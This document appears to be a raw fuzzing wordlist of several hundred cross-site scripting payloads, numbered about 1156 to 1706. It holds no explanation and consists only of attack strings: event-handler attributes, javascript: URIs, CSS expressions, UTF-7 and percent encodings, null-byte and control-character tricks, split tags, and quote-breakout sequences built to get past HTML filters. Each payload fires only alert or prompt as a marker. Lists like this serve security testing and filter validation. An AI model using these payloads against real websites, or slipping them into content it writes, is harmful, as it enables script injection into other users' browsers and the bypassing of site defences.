<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1156);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1158);">
<IFRAME SRC="javascript:alert(1159);"></IFRAME>
<IFRAME SRC=# onmouseover="alert(1160)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert(1161);"></FRAMESET>
<TABLE BACKGROUND="javascript:alert(1162)">
<TABLE><TD BACKGROUND="javascript:alert(1163)">
<DIV STYLE="background-image: url(javascript:alert(1164))">
<DIV STYLE="background-image: url(&#1;javascript:alert(1166))">
<DIV STYLE="width: expression(alert(1167));">
<!--[if gte IE 4]><SCRIPT>alert(1168);</SCRIPT><![endif]-->
<BASE HREF="javascript:alert(1169);//">
<? echo('<SCR)';echo('IPT>alert(1172)</SCRIPT>'); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1174)</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1175);+ADw-/SCRIPT+AD4-
0\"autofocus/onfocus=alert(1184)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/onload=alert(1185)//
#"><img src=M onerror=alert(1186);>
element[attribute='<img src=x onerror=alert(1187);>
[<blockquote cite="]">[" onmouseover="alert(1188);" ]
<scr<script>ipt>alert(1195)</scr</script>ipt><scr<script>ipt>alert(1195)</scr</script>ipt>
<sCR<script>iPt>alert(1196)</SCr</script>IPt>
%253Cscript%253Ealert(1198)%253C%252Fscript%253E
<IMG SRC=x onload="alert(1199))">
<IMG SRC=x onafterprint="alert(1200))">
<IMG SRC=x onbeforeprint="alert(1201))">
<IMG SRC=x onbeforeunload="alert(1202))">
<IMG SRC=x onerror="alert(1203))">
<IMG SRC=x onhashchange="alert(1204))">
<IMG SRC=x onload="alert(1205))">
<IMG SRC=x onmessage="alert(1206))">
<IMG SRC=x ononline="alert(1207))">
<IMG SRC=x onoffline="alert(1208))">
<IMG SRC=x onpagehide="alert(1209))">
<IMG SRC=x onpageshow="alert(1210))">
<IMG SRC=x onpopstate="alert(1211))">
<IMG SRC=x onresize="alert(1212))">
<IMG SRC=x onstorage="alert(1213))">
<IMG SRC=x onunload="alert(1214))">
<IMG SRC=x onblur="alert(1215))">
<IMG SRC=x onchange="alert(1216))">
<IMG SRC=x oncontextmenu="alert(1217))">
<IMG SRC=x oninput="alert(1218))">
<IMG SRC=x oninvalid="alert(1219))">
<IMG SRC=x onreset="alert(1220))">
<IMG SRC=x onsearch="alert(1221))">
<IMG SRC=x onselect="alert(1222))">
<IMG SRC=x onsubmit="alert(1223))">
<IMG SRC=x onkeydown="alert(1224))">
<IMG SRC=x onkeypress="alert(1225))">
<IMG SRC=x onkeyup="alert(1226))">
<IMG SRC=x onclick="alert(1227))">
<IMG SRC=x ondblclick="alert(1228))">
<IMG SRC=x onmousedown="alert(1229))">
<IMG SRC=x onmousemove="alert(1230))">
<IMG SRC=x onmouseout="alert(1231))">
<IMG SRC=x onmouseover="alert(1232))">
<IMG SRC=x onmouseup="alert(1233))">
<IMG SRC=x onmousewheel="alert(1234))">
<IMG SRC=x onwheel="alert(1235))">
<IMG SRC=x ondrag="alert(1236))">
<IMG SRC=x ondragend="alert(1237))">
<IMG SRC=x ondragenter="alert(1238))">
<IMG SRC=x ondragleave="alert(1239))">
<IMG SRC=x ondragover="alert(1240))">
<IMG SRC=x ondragstart="alert(1241))">
<IMG SRC=x ondrop="alert(1242))">
<IMG SRC=x onscroll="alert(1243))">
<IMG SRC=x oncopy="alert(1244))">
<IMG SRC=x oncut="alert(1245))">
<IMG SRC=x onpaste="alert(1246))">
<IMG SRC=x onabort="alert(1247))">
<IMG SRC=x oncanplay="alert(1248))">
<IMG SRC=x oncanplaythrough="alert(1249))">
<IMG SRC=x oncuechange="alert(1250))">
<IMG SRC=x ondurationchange="alert(1251))">
<IMG SRC=x onemptied="alert(1252))">
<IMG SRC=x onended="alert(1253))">
<IMG SRC=x onerror="alert(1254))">
<IMG SRC=x onloadeddata="alert(1255))">
<IMG SRC=x onloadedmetadata="alert(1256))">
<IMG SRC=x onloadstart="alert(1257))">
<IMG SRC=x onpause="alert(1258))">
<IMG SRC=x onplay="alert(1259))">
<IMG SRC=x onplaying="alert(1260))">
<IMG SRC=x onprogress="alert(1261))">
<IMG SRC=x onratechange="alert(1262))">
<IMG SRC=x onseeked="alert(1263))">
<IMG SRC=x onseeking="alert(1264))">
<IMG SRC=x onstalled="alert(1265))">
<IMG SRC=x onsuspend="alert(1266))">
<IMG SRC=x ontimeupdate="alert(1267))">
<IMG SRC=x onvolumechange="alert(1268))">
<IMG SRC=x onwaiting="alert(1269))">
<IMG SRC=x onshow="alert(1270))">
<IMG SRC=x ontoggle="alert(1271))">
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1272)";
<IMG SRC=x onload="alert(1273))">
<INPUT TYPE="BUTTON" action="alert(1274)"/>
"><h1><IFRAME SRC="javascript:alert(1275);"></IFRAME>">123</h1>
"><h1><IFRAME SRC=# onmouseover="alert(1276)"></IFRAME>123</h1>
<IFRAME SRC="javascript:alert(1277);"></IFRAME>
<IFRAME SRC=# onmouseover="alert(1278)"></IFRAME>
"><h1><IFRAME SRC=# onmouseover="alert(1279)"></IFRAME>123</h1>
"></iframe><script>alert(1280);</script><iframe frameborder="0%EF%BB%BF
"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(1281)"></IFRAME>123</h1>
<IFRAME width="420" height="315" frameborder="0" onload="alert(1285)"></IFRAME>
"><h1><IFRAME SRC="javascript:alert(1286);"></IFRAME>">123</h1>
"><h1><IFRAME SRC=# onmouseover="alert(1287)"></IFRAME>123</h1>
<IFRAME SRC="javascript:alert(1289);"></IFRAME>
<IFRAME SRC=# onmouseover="alert(1290)"></IFRAME>
<img src=``&NewLine; onerror=alert(1297)&NewLine;
<script /**/>/**/alert(1301)/**/</script /**/
<iframe/src="data:text/html,<svg &#130313031303;&#130313030;load=alert(1303)>">
<meta content="&NewLine; 1304 &NewLine;; JAVASCRIPT&colon; alert(1304)" http-equiv="refresh"/>
<form><iframe &#09;&#13110;&#13111311; src="javascript&#58;alert(1311)"&#13111311;&#13110;&#09;;>
http://www.google<script .com>alert(1313)</script
<script ^__^>alert(1317))</script ^__^
</style &#32;><script &#32; :-(>/**/alert(1318)/**/</script &#32; :-(
&#00;</form><input type&#61319;"date" onfocus="alert(1319)">
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1323)&NewLine;>X</a>
<script ~~~>alert(1324)</script ~~~>
<iframe// src=javaSCRIPT&colon;alert(1332)
<%<!--'%><script>alert(1349);</script -->
<script src="data:text/javascript,alert(1350)"></script>
<iframe/onreadystatechange=alert(1352)
<svg/onload=alert(1353)
<input type="text" value=`` <div/onmouseover='alert(1355)'>X</div>
http://www.<script>alert(1356)</script .com
<svg><script ?>alert(1358)
<img src=`xx:xx`onerror=alert(1360)>
<meta http-equiv="refresh" content="0;javascript&colon;alert(1362)"/>
<script>+-+-1372-+-+alert(1372)</script>
<body/onload=&lt;!--&gt;&#13730alert(1373)>
<script itworksinallbrowsers>/*<script* */alert(1374)</script
<img src ?itworksonchrome?\/onerror = alert(1375)
<svg><script onlypossibleinopera:-)> alert(1377)
<script x> alert(1379) </script 1379=2
<div/onmouseover='alert(1380)'> style="x:">
<--`<img/src=` onerror=alert(1381)> --!>
<div style="position:absolute;top:0;left:0;width:138300%;height:138300%" onmouseover="prompt(1383)" onclick="alert(1383)">x</button>
<form><button formaction=javascript&colon;alert(1385)>CLICKME
<script\x20type="text/javascript">javascript:alert(1390);</script>
<script\x3Etype="text/javascript">javascript:alert(1391);</script>
<script\x0Dtype="text/javascript">javascript:alert(1392);</script>
<script\x09type="text/javascript">javascript:alert(1393);</script>
<script\x0Ctype="text/javascript">javascript:alert(1394);</script>
<script\x2Ftype="text/javascript">javascript:alert(1395);</script>
<script\x0Atype="text/javascript">javascript:alert(1396);</script>
'`"><\x3Cscript>javascript:alert(1397)</script>
'`"><\x00script>javascript:alert(1398)</script>
<img src=1399 href=1399 onerror="javascript:alert(1399)"></img>
<audio src=1400 href=1400 onerror="javascript:alert(1400)"></audio>
<video src=1401 href=1401 onerror="javascript:alert(1401)"></video>
<body src=1402 href=1402 onerror="javascript:alert(1402)"></body>
<image src=1403 href=1403 onerror="javascript:alert(1403)"></image>
<object src=1404 href=1404 onerror="javascript:alert(1404)"></object>
<script src=1405 href=1405 onerror="javascript:alert(1405)"></script>
<svg onResize svg onResize="javascript:javascript:alert(1406)"></svg onResize>
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1407)"></title onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:alert(1408)"></iframe onLoad>
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1409)"></body onMouseEnter>
<body onFocus body onFocus="javascript:javascript:alert(1410)"></body onFocus>
<frameset onScroll frameset onScroll="javascript:javascript:alert(1411)"></frameset onScroll>
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1412)"></script onReadyStateChange>
<html onMouseUp html onMouseUp="javascript:javascript:alert(1413)"></html onMouseUp>
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1414)"></body onPropertyChange>
<svg onLoad svg onLoad="javascript:javascript:alert(1415)"></svg onLoad>
<body onPageHide body onPageHide="javascript:javascript:alert(1416)"></body onPageHide>
<body onMouseOver body onMouseOver="javascript:javascript:alert(1417)"></body onMouseOver>
<body onUnload body onUnload="javascript:javascript:alert(1418)"></body onUnload>
<body onLoad body onLoad="javascript:javascript:alert(1419)"></body onLoad>
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1420)"></bgsound onPropertyChange>
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1421)"></html onMouseLeave>
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1422)"></html onMouseWheel>
<style onLoad style onLoad="javascript:javascript:alert(1423)"></style onLoad>
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1424)"></iframe onReadyStateChange>
<body onPageShow body onPageShow="javascript:javascript:alert(1425)"></body onPageShow>
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1426)"></style onReadyStateChange>
<frameset onFocus frameset onFocus="javascript:javascript:alert(1427)"></frameset onFocus>
<applet onError applet onError="javascript:javascript:alert(1428)"></applet onError>
<marquee onStart marquee onStart="javascript:javascript:alert(1429)"></marquee onStart>
<script onLoad script onLoad="javascript:javascript:alert(1430)"></script onLoad>
<html onMouseOver html onMouseOver="javascript:javascript:alert(1431)"></html onMouseOver>
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1432)"></html onMouseEnter>
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1433)"></body onBeforeUnload>
<html onMouseDown html onMouseDown="javascript:javascript:alert(1434)"></html onMouseDown>
<marquee onScroll marquee onScroll="javascript:javascript:alert(1435)"></marquee onScroll>
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1436)"></xml onPropertyChange>
<frameset onBlur frameset onBlur="javascript:javascript:alert(1437)"></frameset onBlur>
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1438)"></applet onReadyStateChange>
<svg onUnload svg onUnload="javascript:javascript:alert(1439)"></svg onUnload>
<html onMouseOut html onMouseOut="javascript:javascript:alert(1440)"></html onMouseOut>
<body onMouseMove body onMouseMove="javascript:javascript:alert(1441)"></body onMouseMove>
<body onResize body onResize="javascript:javascript:alert(1442)"></body onResize>
<object onError object onError="javascript:javascript:alert(1443)"></object onError>
<body onPopState body onPopState="javascript:javascript:alert(1444)"></body onPopState>
<html onMouseMove html onMouseMove="javascript:javascript:alert(1445)"></html onMouseMove>
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1446)"></applet onreadystatechange>
<body onpagehide body onpagehide="javascript:javascript:alert(1447)"></body onpagehide>
<svg onunload svg onunload="javascript:javascript:alert(1448)"></svg onunload>
<applet onerror applet onerror="javascript:javascript:alert(1449)"></applet onerror>
<body onkeyup body onkeyup="javascript:javascript:alert(1450)"></body onkeyup>
<body onunload body onunload="javascript:javascript:alert(1451)"></body onunload>
<iframe onload iframe onload="javascript:javascript:alert(1452)"></iframe onload>
<body onload body onload="javascript:javascript:alert(1453)"></body onload>
<html onmouseover html onmouseover="javascript:javascript:alert(1454)"></html onmouseover>
<object onbeforeload object onbeforeload="javascript:javascript:alert(1455)"></object onbeforeload>
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1456)"></body onbeforeunload>
<body onfocus body onfocus="javascript:javascript:alert(1457)"></body onfocus>
<body onkeydown body onkeydown="javascript:javascript:alert(1458)"></body onkeydown>
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1459)"></iframe onbeforeload>
<iframe src iframe src="javascript:javascript:alert(1460)"></iframe src>
<svg onload svg onload="javascript:javascript:alert(1461)"></svg onload>
<html onmousemove html onmousemove="javascript:javascript:alert(1462)"></html onmousemove>
<body onblur body onblur="javascript:javascript:alert(1463)"></body onblur>
\x3Cscript>javascript:alert(1464)</script>
'"`><script>/* *\x2Fjavascript:alert(1465)// */</script>
<script>javascript:alert(1466)</script\x0D
<script>javascript:alert(1467)</script\x0A
<script>javascript:alert(1468)</script\x0B
<script charset="\x22>javascript:alert(1469)</script>
<!--\x3E<img src=xxx:x onerror=javascript:alert(1470)> -->
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1471)> -->
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1472)> -->
--><!-- --\x21473> <img src=xxx:x onerror=javascript:alert(1473)> -->
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1474)> -->
`"'><img src='#\x27 onerror=javascript:alert(1475)>
<a href="javascript\x3Ajavascript:alert(1476)" id="fuzzelement1476">test</a>
"'`><p><svg><script>a='hello\x27;javascript:alert(1477)//';</script></p>
<a href="javas\x00cript:javascript:alert(1478)" id="fuzzelement1478">test</a>
<a href="javas\x07cript:javascript:alert(1479)" id="fuzzelement1479">test</a>
<a href="javas\x0Dcript:javascript:alert(1480)" id="fuzzelement1480">test</a>
<a href="javas\x0Acript:javascript:alert(1481)" id="fuzzelement1481">test</a>
<a href="javas\x08cript:javascript:alert(1482)" id="fuzzelement1482">test</a>
<a href="javas\x02cript:javascript:alert(1483)" id="fuzzelement1483">test</a>
<a href="javas\x03cript:javascript:alert(1484)" id="fuzzelement1484">test</a>
<a href="javas\x04cript:javascript:alert(1485)" id="fuzzelement1485">test</a>
<a href="javas\x01486cript:javascript:alert(1486)" id="fuzzelement1486">test</a>
<a href="javas\x05cript:javascript:alert(1487)" id="fuzzelement1487">test</a>
<a href="javas\x0Bcript:javascript:alert(1488)" id="fuzzelement1488">test</a>
<a href="javas\x09cript:javascript:alert(1489)" id="fuzzelement1489">test</a>
<a href="javas\x06cript:javascript:alert(1490)" id="fuzzelement1490">test</a>
<a href="javas\x0Ccript:javascript:alert(1491)" id="fuzzelement1491">test</a>
<script>/* *\x2A/javascript:alert(1492)// */</script>
<script>/* *\x00/javascript:alert(1493)// */</script>
<style></style\x3E<img src="about:blank" onerror=javascript:alert(1494)//></style>
<style></style\x0D<img src="about:blank" onerror=javascript:alert(1495)//></style>
<style></style\x09<img src="about:blank" onerror=javascript:alert(1496)//></style>
<style></style\x20<img src="about:blank" onerror=javascript:alert(1497)//></style>
<style></style\x0A<img src="about:blank" onerror=javascript:alert(1498)//></style>
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1499);/*';">DEF
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1500);/*';">DEF
<script>if("x\\xE1501\x96\x89".length==2) { javascript:alert(1501);}</script>
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1502);}</script>
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1503);}</script>
'`"><\x3Cscript>javascript:alert(1504)</script>
'`"><\x00script>javascript:alert(1505)</script>
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1506)>
"'`><\x00img src=xxx:x onerror=javascript:alert(1507)>
<script src="data:text/plain\x2Cjavascript:alert(1508)"></script>
<script src="data:\xD4\x8F,javascript:alert(1509)"></script>
<script src="data:\xE0\xA4\x98,javascript:alert(1510)"></script>
<script src="data:\xCB\x8F,javascript:alert(1511)"></script>
<script\x20type="text/javascript">javascript:alert(1512);</script>
<script\x3Etype="text/javascript">javascript:alert(1513);</script>
<script\x0Dtype="text/javascript">javascript:alert(1514);</script>
<script\x09type="text/javascript">javascript:alert(1515);</script>
<script\x0Ctype="text/javascript">javascript:alert(1516);</script>
<script\x2Ftype="text/javascript">javascript:alert(1517);</script>
<script\x0Atype="text/javascript">javascript:alert(1518);</script>
ABC<div style="x\x3Aexpression(javascript:alert(1519)">DEF
ABC<div style="x:expression\x5C(javascript:alert(1520)">DEF
ABC<div style="x:expression\x00(javascript:alert(1521)">DEF
ABC<div style="x:exp\x00ression(javascript:alert(1522)">DEF
ABC<div style="x:exp\x5Cression(javascript:alert(1523)">DEF
ABC<div style="x:\x0Aexpression(javascript:alert(1524)">DEF
ABC<div style="x:\x09expression(javascript:alert(1525)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1526)">DEF
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1527)">DEF
ABC<div style="x:\xC2\xA0expression(javascript:alert(1528)">DEF
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1529)">DEF
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1530)">DEF
ABC<div style="x:\x0Dexpression(javascript:alert(1531)">DEF
ABC<div style="x:\x0Cexpression(javascript:alert(1532)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1533)">DEF
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1534)">DEF
ABC<div style="x:\x20expression(javascript:alert(1535)">DEF
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1536)">DEF
ABC<div style="x:\x00expression(javascript:alert(1537)">DEF
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1538)">DEF
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1539)">DEF
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1540)">DEF
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1541)">DEF
ABC<div style="x:\x0Bexpression(javascript:alert(1542)">DEF
ABC<div style="x:\xE2\x80\x81543expression(javascript:alert(1543)">DEF
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1544)">DEF
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1545)">DEF
<a href="\x0Bjavascript:javascript:alert(1546)" id="fuzzelement1546">test</a>
<a href="\x0Fjavascript:javascript:alert(1547)" id="fuzzelement1547">test</a>
<a href="\xC2\xA0javascript:javascript:alert(1548)" id="fuzzelement1548">test</a>
<a href="\x05javascript:javascript:alert(1549)" id="fuzzelement1549">test</a>
<a href="\xE1550\xA0\x8Ejavascript:javascript:alert(1550)" id="fuzzelement1550">test</a>
<a href="\x15518javascript:javascript:alert(1551)" id="fuzzelement1551">test</a>
<a href="\x15521552javascript:javascript:alert(1552)" id="fuzzelement1552">test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(1553)" id="fuzzelement1553">test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(1554)" id="fuzzelement1554">test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(1555)" id="fuzzelement1555">test</a>
<a href="\x15567javascript:javascript:alert(1556)" id="fuzzelement1556">test</a>
<a href="\x03javascript:javascript:alert(1557)" id="fuzzelement1557">test</a>
<a href="\x0Ejavascript:javascript:alert(1558)" id="fuzzelement1558">test</a>
<a href="\x1559Ajavascript:javascript:alert(1559)" id="fuzzelement1559">test</a>
<a href="\x00javascript:javascript:alert(1560)" id="fuzzelement1560">test</a>
<a href="\x15610javascript:javascript:alert(1561)" id="fuzzelement1561">test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(1562)" id="fuzzelement1562">test</a>
<a href="\x20javascript:javascript:alert(1563)" id="fuzzelement1563">test</a>
<a href="\x15643javascript:javascript:alert(1564)" id="fuzzelement1564">test</a>
<a href="\x09javascript:javascript:alert(1565)" id="fuzzelement1565">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1566)" id="fuzzelement1566">test</a>
<a href="\x15674javascript:javascript:alert(1567)" id="fuzzelement1567">test</a>
<a href="\x15689javascript:javascript:alert(1568)" id="fuzzelement1568">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(1569)" id="fuzzelement1569">test</a>
<a href="\x1570Fjavascript:javascript:alert(1570)" id="fuzzelement1570">test</a>
<a href="\xE2\x80\x81571javascript:javascript:alert(1571)" id="fuzzelement1571">test</a>
<a href="\x1572Djavascript:javascript:alert(1572)" id="fuzzelement1572">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(1573)" id="fuzzelement1573">test</a>
<a href="\x07javascript:javascript:alert(1574)" id="fuzzelement1574">test</a>
<a href="\xE1575\x9A\x80javascript:javascript:alert(1575)" id="fuzzelement1575">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(1576)" id="fuzzelement1576">test</a>
<a href="\x04javascript:javascript:alert(1577)" id="fuzzelement1577">test</a>
<a href="\x01578javascript:javascript:alert(1578)" id="fuzzelement1578">test</a>
<a href="\x08javascript:javascript:alert(1579)" id="fuzzelement1579">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(1580)" id="fuzzelement1580">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(1581)" id="fuzzelement1581">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(1582)" id="fuzzelement1582">test</a>
<a href="\x15832javascript:javascript:alert(1583)" id="fuzzelement1583">test</a>
<a href="\x0Djavascript:javascript:alert(1584)" id="fuzzelement1584">test</a>
<a href="\x0Ajavascript:javascript:alert(1585)" id="fuzzelement1585">test</a>
<a href="\x0Cjavascript:javascript:alert(1586)" id="fuzzelement1586">test</a>
<a href="\x15875javascript:javascript:alert(1587)" id="fuzzelement1587">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(1588)" id="fuzzelement1588">test</a>
<a href="\x15896javascript:javascript:alert(1589)" id="fuzzelement1589">test</a>
<a href="\x02javascript:javascript:alert(1590)" id="fuzzelement1590">test</a>
<a href="\x1591Bjavascript:javascript:alert(1591)" id="fuzzelement1591">test</a>
<a href="\x06javascript:javascript:alert(1592)" id="fuzzelement1592">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(1593)" id="fuzzelement1593">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(1594)" id="fuzzelement1594">test</a>
<a href="\x1595Ejavascript:javascript:alert(1595)" id="fuzzelement1595">test</a>
<a href="\xE2\x81596\x9Fjavascript:javascript:alert(1596)" id="fuzzelement1596">test</a>
<a href="\x1597Cjavascript:javascript:alert(1597)" id="fuzzelement1597">test</a>
<a href="javascript\x00:javascript:alert(1598)" id="fuzzelement1598">test</a>
<a href="javascript\x3A:javascript:alert(1599)" id="fuzzelement1599">test</a>
<a href="javascript\x09:javascript:alert(1600)" id="fuzzelement1600">test</a>
<a href="javascript\x0D:javascript:alert(1601)" id="fuzzelement1601">test</a>
<a href="javascript\x0A:javascript:alert(1602)" id="fuzzelement1602">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1603)>
`"'><img src=xxx:x \x22onerror=javascript:alert(1604)>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1605)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(1606)>
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1607)>
`"'><img src=xxx:x \x09onerror=javascript:alert(1608)>
`"'><img src=xxx:x \x0Conerror=javascript:alert(1609)>
`"'><img src=xxx:x \x00onerror=javascript:alert(1610)>
`"'><img src=xxx:x \x27onerror=javascript:alert(1611)>
`"'><img src=xxx:x \x20onerror=javascript:alert(1612)>
"`'><script>\x3Bjavascript:alert(1613)</script>
"`'><script>\x0Djavascript:alert(1614)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(1615)</script>
"`'><script>\xE2\x80\x81616javascript:alert(1616)</script>
"`'><script>\xE2\x80\x84javascript:alert(1617)</script>
"`'><script>\xE3\x80\x80javascript:alert(1618)</script>
"`'><script>\x09javascript:alert(1619)</script>
"`'><script>\xE2\x80\x89javascript:alert(1620)</script>
"`'><script>\xE2\x80\x85javascript:alert(1621)</script>
"`'><script>\xE2\x80\x88javascript:alert(1622)</script>
"`'><script>\x00javascript:alert(1623)</script>
"`'><script>\xE2\x80\xA8javascript:alert(1624)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(1625)</script>
"`'><script>\xE1626\x9A\x80javascript:alert(1626)</script>
"`'><script>\x0Cjavascript:alert(1627)</script>
"`'><script>\x2Bjavascript:alert(1628)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1629)</script>
"`'><script>-javascript:alert(1630)</script>
"`'><script>\x0Ajavascript:alert(1631)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(1632)</script>
"`'><script>\x7Ejavascript:alert(1633)</script>
"`'><script>\xE2\x80\x87javascript:alert(1634)</script>
"`'><script>\xE2\x81635\x9Fjavascript:alert(1635)</script>
"`'><script>\xE2\x80\xA9javascript:alert(1636)</script>
"`'><script>\xC2\x85javascript:alert(1637)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(1638)</script>
"`'><script>\xE2\x80\x83javascript:alert(1639)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(1640)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(1641)</script>
"`'><script>\xE2\x80\x80javascript:alert(1642)</script>
"`'><script>\x21643javascript:alert(1643)</script>
"`'><script>\xE2\x80\x82javascript:alert(1644)</script>
"`'><script>\xE2\x80\x86javascript:alert(1645)</script>
"`'><script>\xE1646\xA0\x8Ejavascript:alert(1646)</script>
"`'><script>\x0Bjavascript:alert(1647)</script>
"`'><script>\x20javascript:alert(1648)</script>
"`'><script>\xC2\xA0javascript:alert(1649)</script>
"/><img/onerror=\x0Bjavascript:alert(1650)\x0Bsrc=xxx:x />
"/><img/onerror=\x22javascript:alert(1651)\x22src=xxx:x />
"/><img/onerror=\x09javascript:alert(1652)\x09src=xxx:x />
"/><img/onerror=\x27javascript:alert(1653)\x27src=xxx:x />
"/><img/onerror=\x0Ajavascript:alert(1654)\x0Asrc=xxx:x />
"/><img/onerror=\x0Cjavascript:alert(1655)\x0Csrc=xxx:x />
"/><img/onerror=\x0Djavascript:alert(1656)\x0Dsrc=xxx:x />
"/><img/onerror=\x60javascript:alert(1657)\x60src=xxx:x />
"/><img/onerror=\x20javascript:alert(1658)\x20src=xxx:x />
<script\x2F>javascript:alert(1659)</script>
<script\x20>javascript:alert(1660)</script>
<script\x0D>javascript:alert(1661)</script>
<script\x0A>javascript:alert(1662)</script>
<script\x0C>javascript:alert(1663)</script>
<script\x00>javascript:alert(1664)</script>
<script\x09>javascript:alert(1665)</script>
"><img src=x onerror=javascript:alert(1666)>
"><img src=x onerror=javascript:alert(1667)>
"><img src=x onerror=javascript:alert(1668)>
"><img src=x onerror=javascript:alert(1669)>
"><img src=x onerror=javascript:alert(1670))>
"><img src=x onerror=javascript:alert(1671))>
"><img src=x onerror=javascript:alert(1672))>
"><img src=x onerror=javascript:alert(1673)>
"><img src=x onerror=javascript:alert(1674))>
"><img src=x onerror=javascript:alert(1675))>
"><img src=x onerror=javascript:alert(1676)>
"><img src=x onerror=javascript:alert(1677))>
"><img src=x onerror=javascript:alert(1678)>
"><img src=x onerror=javascript:alert(1679))>
"><img src=x onerror=javascript:alert(1680)>
`"'><img src=xxx:x onerror\x0B=javascript:alert(1681)>
`"'><img src=xxx:x onerror\x00=javascript:alert(1682)>
`"'><img src=xxx:x onerror\x0C=javascript:alert(1683)>
`"'><img src=xxx:x onerror\x0D=javascript:alert(1684)>
`"'><img src=xxx:x onerror\x20=javascript:alert(1685)>
`"'><img src=xxx:x onerror\x0A=javascript:alert(1686)>
`"'><img src=xxx:x onerror\x09=javascript:alert(1687)>
<script>javascript:alert(1688)<\x00/script>
<img src=# onerror\x3D"javascript:alert(1689)" >
<input onfocus=javascript:alert(1690) autofocus>
<input onblur=javascript:alert(1691) autofocus><input autofocus>
<video poster=javascript:javascript:alert(1692)//
<body onscroll=javascript:alert(1693)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=test onforminput=javascript:alert(1694)><input></form><button form=test onformchange=javascript:alert(1694)>X
<video><source onerror="javascript:javascript:alert(1695)">
<video onerror="javascript:javascript:alert(1696)"><source>
<form><button formaction="javascript:javascript:alert(1697)">X
<body oninput=javascript:alert(1698)><input autofocus>
<math href="javascript:javascript:alert(1699)">CLICKME</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1699)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1700)>
<table background="javascript:javascript:alert(1701)">
<!--<img src="--><img src=x onerror=javascript:alert(1702)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1703))//">
<![><img src="]><img src=x onerror=javascript:alert(1704)//">
<style><img src="</style><img src=x onerror=javascript:alert(1705)//">
<li style=list-style:url() onerror=javascript:alert(1706)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1706)></div>
